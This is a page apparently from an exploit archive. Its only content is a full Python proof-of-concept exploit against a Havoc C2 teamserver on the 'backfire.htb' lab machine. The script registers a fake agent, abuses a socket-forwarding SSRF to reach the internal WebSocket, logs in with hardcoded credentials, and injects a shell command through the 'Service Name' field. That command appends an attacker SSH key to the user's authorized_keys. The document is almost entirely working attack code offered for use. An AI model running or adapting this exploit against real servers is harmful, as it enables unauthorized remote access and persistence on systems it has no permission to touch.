4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / exploit.py PY
import os
import json
import random
import string
import binascii
import requests
import urllib3
import subprocess
from hashlib import sha3_256
from Crypto.Cipher import AES
from Crypto.Util import Counter

# Disable SSL warnings (not recommended for production)
urllib3.disable_warnings()
requests.packages.urllib3.disable_warnings(
    requests.packages.urllib3.exceptions.InsecureRequestWarning
)

# Constants and configurations
TEAMSRV_URL = "https://backfire.htb"
HEADERS = {"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64)"}
C2_USER = "ilya"
C2_PASS_RAW = "CobaltStr1keSuckz!"
C2_PASS_HASH = sha3_256(C2_PASS_RAW.encode()).hexdigest()
MAGIC_COOKIE = b"\xde\xad\xbe\xef"
AES_KEY = b"\x00" * 32
AES_IV = b"\x00" * 16
AGENT_ID = random.randint(100000, 999999).to_bytes(4, "big")
HOSTNAME = b"DESKTOP-ASDF123"
USERNAME = b"Administrator"
DOMAIN_NAME = b"ECORP"
INTERNAL_IP = b"127.0.0.1"
PROCESS_NAME = "msedge.exe".encode("utf-16le")
PROCESS_ID = random.randint(1000, 5000).to_bytes(4, "big")
SOCK_ID = b"\x11\x11\x11\x11"
SOCK_IP = "127.0.0.1"
SOCK_PORT = 40056
SSH_KEYFILE = "key"

# Logging functions
def log_info(message):
    print(f"[INFO] {message}")

def log_error(message):
    print(f"[ERROR] {message}")

# Padding AES key to ensure it is 32 bytes
def pad_key(k: bytes) -> bytes:
    """Ensures the AES key is exactly 32 bytes."""
    return k + b"0" * (32 - len(k)) if len(k) < 32 else k

# AES CTR mode encryption
def aes_ctr_encrypt(k: bytes, iv: bytes, data: bytes) -> bytes:
    ctr = Counter.new(128, initial_value=int(binascii.hexlify(iv), 16))
    return AES.new(pad_key(k), AES.MODE_CTR, counter=ctr).encrypt(data)

# AES CTR mode decryption
def aes_ctr_decrypt(k: bytes, iv: bytes, data: bytes) -> bytes:
    ctr = Counter.new(128, initial_value=int(binascii.hexlify(iv), 16))
    return AES.new(pad_key(k), AES.MODE_CTR, counter=ctr).decrypt(data)

# Integer to big-endian bytes
def i2b(v: int, length: int = 4) -> bytes:
    """Integer to big-endian bytes."""
    return v.to_bytes(length, "big")

# Send a POST request
def post_data(packet: bytes) -> requests.Response:
    """Send a POST request to TEAMSRV_URL with the given packet."""
    try:
        r = requests.post(TEAMSRV_URL, data=packet, headers=HEADERS, verify=False)
        return r
    except requests.RequestException as e:
        log_error(f"POST request failed: {e}")
        class DummyResponse:
            status_code = 0
            content = b""
        return DummyResponse()

# Generate an SSH key if it doesn't exist, return public key contents
def create_ssh_key() -> str:
    """Generate an SSH key if it doesn't exist, return public key contents."""
    if not os.path.exists(SSH_KEYFILE):
        log_info("Generating SSH key...")
        cmd = ["ssh-keygen", "-t", "ed25519", "-C", SSH_KEYFILE, "-f", SSH_KEYFILE, "-q", "-N", ""]
        try:
            subprocess.run(cmd, check=True)
            os.chmod(SSH_KEYFILE, 0o600)
        except (subprocess.CalledProcessError, FileNotFoundError) as e:
            log_error(f"SSH key generation failed: {e}")
            return ""
    pubfile = SSH_KEYFILE + ".pub"
    if os.path.exists(pubfile):
        return open(pubfile, "r").read().strip()
    return ""

# Build a masked WebSocket frame for the given message
def build_websocket_frame(msg: str) -> bytes:
    """Build a masked WebSocket frame for the given message."""
    payload = msg.encode("utf-8")
    first_byte = 0x81  # text frame
    mask_bit = 0x80
    length = len(payload)
    # Encode the payload length
    if length <= 125:
        header = bytes([first_byte, mask_bit | length])
    elif length <= 65535:
        header = bytes([first_byte, mask_bit | 126]) + length.to_bytes(2, "big")
    else:
        header = bytes([first_byte, mask_bit | 127]) + length.to_bytes(8, "big")
    # Random mask
    mask = os.urandom(4)
    masked_payload = bytes(b ^ mask[i % 4] for i, b in enumerate(payload))
    return header + mask + masked_payload

# Send a packet with optional AES-CTR encryption
def send_packet(cmd: bytes, rid: bytes, body: bytes, desc: str, encrypt=True) -> None:
    """
    Construct a packet with optional AES-CTR encryption and send it.
    Logs success/fail status for the given desc.
    """
    if encrypt:
        # Encrypt length + body
        enc = aes_ctr_encrypt(AES_KEY, AES_IV, i2b(len(body) + 4) + body)
        pkt = i2b(12 + len(enc)) + MAGIC_COOKIE + AGENT_ID + cmd + rid + enc
    else:
        pkt = i2b(12 + len(body)) + MAGIC_COOKIE + AGENT_ID + body
    r = post_data(pkt)
    if r.status_code == 200:
        log_info(f"{desc} => OK")
    elif r.status_code == 404:
        log_info("You have pawned it!")
    else:
        log_error(f"{desc} => FAIL ({r.status_code})")

# Register agent
def step_register_agent():
    log_info("Registering agent...")
    cmd_id = b"\x00\x00\x00\x63"
    req_id = b"\x00\x00\x00\x01"
    extra = b"\xab" * 100
    body = (
        cmd_id
        + req_id
        + AES_KEY
        + AES_IV
        + AGENT_ID
        + i2b(len(HOSTNAME))
        + HOSTNAME
        + i2b(len(USERNAME))
        + USERNAME
        + i2b(len(DOMAIN_NAME))
        + DOMAIN_NAME
        + i2b(len(INTERNAL_IP))
        + INTERNAL_IP
        + i2b(len(PROCESS_NAME) - 6)
        + PROCESS_NAME
        + PROCESS_ID
        + extra
    )
    send_packet(b"", b"", body, "Register Agent", encrypt=False)

# Open socket on the teamserver
def step_open_socket():
    log_info("Opening socket on the teamserver...")
    cmd = b"\x00\x00\x09\xec"
    rid = b"\x00\x00\x00\x02"
    sub = b"\x00\x00\x00\x10"
    la = b"\x22\x22\x22\x22"
    lp = b"\x33\x33\x33\x33"
    rev_ip = b"".join(int(x).to_bytes(1, "big") for x in SOCK_IP.split(".")[::-1])
    fwd_port = i2b(SOCK_PORT)
    body = sub + SOCK_ID + la + lp + rev_ip + fwd_port
    send_packet(cmd, rid, body, "Open Socket")

# Write data to the socket
def step_write_socket(data_bytes: bytes, desc: str, subcmd: bytes = b"\x00\x00\x00\x11"):
    """
    Write data to the socket. You can customize subcmd if needed.
    """
    cmd = b"\x00\x00\x09\xec"
    rid = b"\x00\x00\x00\x08"
    st = b"\x00\x00\x00\x03"
    scs = b"\x00\x00\x00\x01"
    body = subcmd + SOCK_ID + st + scs + i2b(len(data_bytes)) + data_bytes
    send_packet(cmd, rid, body, desc)

# Read data from the socket and decrypt it
def step_read_socket() -> bytes:
    """Read data from the socket, decrypt, and return it."""
    log_info("Reading response from socket...")
    cmd = b"\x00\x00\x00\x01"
    rid = b"\x00\x00\x00\x09"
    pkt = i2b(12 + len(cmd + rid)) + MAGIC_COOKIE + AGENT_ID + cmd + rid
    r = post_data(pkt)
    if r.status_code != 200:
        log_error(f"Read from Socket => FAIL ({r.status_code})")
        return b""
    log_info("Read from Socket => OK")
    dec = aes_ctr_decrypt(AES_KEY, AES_IV, r.content[12:])
    return dec[12:]

# Main script execution
ssh_pub = create_ssh_key()
if not ssh_pub:
    log_error("No SSH public key found or could not be generated.")
    raise SystemExit

step_register_agent()
step_open_socket()

handshake_req = (
    b"GET /havoc/ HTTP/1.1\r\n"
    b"Host: 127.0.0.1:40056\r\n"
    b"Upgrade: websocket\r\n"
    b"Sec-WebSocket-Key: h/TPDav2VwnJVqKeDYxRgQ==\r\n"
    b"Sec-WebSocket-Version: 13\r\n"
    b"Connection: Upgrade\r\n\r\n"
)
step_write_socket(handshake_req, "WebSocket Handshake")

auth_payload = {
    "Body": {"Info": {"Password": C2_PASS_HASH, "User": C2_USER}, "SubEvent": 3},
    "Head": {"Event": 1, "OneTime": "", "Time": "18:40:17", "User": C2_USER},
}
step_write_socket(build_websocket_frame(json.dumps(auth_payload)), "Authenticate C2")

rnd_listener = "".join(
    random.choice(string.ascii_lowercase + string.digits) for _ in range(16)
)
rnd_port = random.randint(1024, 65535)
listener_info = {
    "Body": {
        "Info": {
            "Headers": "",
            "HostBind": "0.0.0.0",
            "HostHeader": "",
            "HostRotation": "round-robin",
            "Hosts": "0.0.0.0",
            "Name": rnd_listener,
            "PortBind": str(rnd_port),
            "PortConn": str(rnd_port),
            "Protocol": "Https",
            "Proxy Enabled": "false",
            "Secure": "true",
            "Status": "online",
            "Uris": "",
            "UserAgent": "Mozilla/5.0 (Windows NT 6.1; WOW64)",
        },
        "SubEvent": 1,
    },
    "Head": {"Event": 2, "OneTime": "", "Time": "00:00:00", "User": C2_USER},
}
step_write_socket(build_websocket_frame(json.dumps(listener_info)), "Create Listener")

cmd_injection = (
    "mkdir -p /home/ilya/.ssh && "
    f"echo '{ssh_pub}' >> /home/ilya/.ssh/authorized_keys && "
    "chmod 700 /home/ilya/.ssh && chmod 600 /home/ilya/.ssh/authorized_keys"
    "Run script"
)
injection_svc = f' \\\\\\" -mbla; {cmd_injection} && false #'
final_json = {
    "Body": {
        "Info": {
            "AgentType": "Demon",
            "Arch": "x64",
            "Listener": rnd_listener,
            "Config": (
                "{\n"
                ' "Amsi/Etw Patch": "None",\n'
                ' "Indirect Syscall": false,\n'
                ' "Injection": {\n'
                ' "Alloc": "Native/Syscall",\n'
                ' "Execute": "Native/Syscall",\n'
                ' "Spawn32": "C:\\\\Windows\\\\SysWOW64\\\\notepad.exe",\n'
                ' "Spawn64": "C:\\\\Windows\\\\System32\\\\notepad.exe"\n'
                " },\n"
                ' "Jitter": "0",\n'
                ' "Proxy Loading": "None (LdrLoadDll)",\n'
                f' "Service Name":"{injection_svc}",\n'
                ' "Sleep": "2",\n'
                ' "Sleep Jmp Gadget": "None",\n'
                ' "Sleep Technique": "WaitForSingleObjectEx",\n'
                ' "Stack Duplication": false\n'
                "}"
            ),
            "Format": "Windows Service Exe",
        },
        "SubEvent": 2,
    },
    "Head": {"Event": 5, "OneTime": "true", "Time": "18:39:04", "User": C2_USER},
}
step_write_socket(build_websocket_frame(json.dumps(final_json)), "Inject SSH Key")

resp = step_read_socket()
if resp:
    log_info("[Teamserver Final Response]\n" + resp.decode("utf-8", errors="ignore"))
    print("\033[1;32m\n~~~~~Exploit complete!~~~~~\033[0m")
    print("You can now SSH into the target via:")
    print(f"\033[1;93mssh -i {SSH_KEYFILE} [email protected]\033[0m")
    print("\033[1;31m\n~~~~~Pawned!~~~~~\033[0m")
else:
    log_error("[Teamserver Final Response]\n" + (resp.decode("utf-8", errors="ignore") if resp else "No response"))